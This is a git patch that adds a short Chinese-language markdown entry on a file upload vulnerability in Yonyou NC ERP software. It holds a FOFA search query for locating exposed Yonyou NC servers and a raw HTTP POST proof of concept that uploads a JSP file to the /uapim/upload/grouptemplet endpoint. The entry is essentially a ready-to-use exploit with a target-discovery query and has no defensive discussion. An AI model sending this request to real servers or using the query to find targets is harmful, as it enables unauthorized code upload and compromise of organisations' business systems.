From ca5f3e3efb90b44836974aa55bdf9600afad42d7 Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Wed, 17 Apr 2024 20:06:37 +0800 Subject: [PATCH] =?UTF-8?q?Create=20=E7=94=A8=E5=8F=8BNC=5Fgrouptemplet?= =?UTF-8?q?=E6=96=87=E4=BB=B6=E4=B8=8A=E4=BC=A0=E6=BC=8F=E6=B4=9E.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- 用友NC_grouptemplet文件上传漏洞.md | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 用友NC_grouptemplet文件上传漏洞.md diff --git a/用友NC_grouptemplet文件上传漏洞.md b/用友NC_grouptemplet文件上传漏洞.md new file mode 100644 index 0000000..a09e77c --- /dev/null +++ b/用友NC_grouptemplet文件上传漏洞.md @@ -0,0 +1,23 @@ +## 用友NC_grouptemplet文件上传漏洞 + + +## fofa +``` +title="YONYOU NC" +``` + + +## poc +``` +POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp&maxSize=999 HTTP/1.1 +Host: +Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryEXmnamw5gVZG9KAQ +User-Agent: Mozilla/5.0 + +------WebKitFormBoundaryEXmnamw5gVZG9KAQ +Content-Disposition: form-data; name="file"; filename="test.jsp" +Content-Type: application/octet-stream + +111111111111111111111 +------WebKitFormBoundaryEXmnamw5gVZG9KAQ-- +```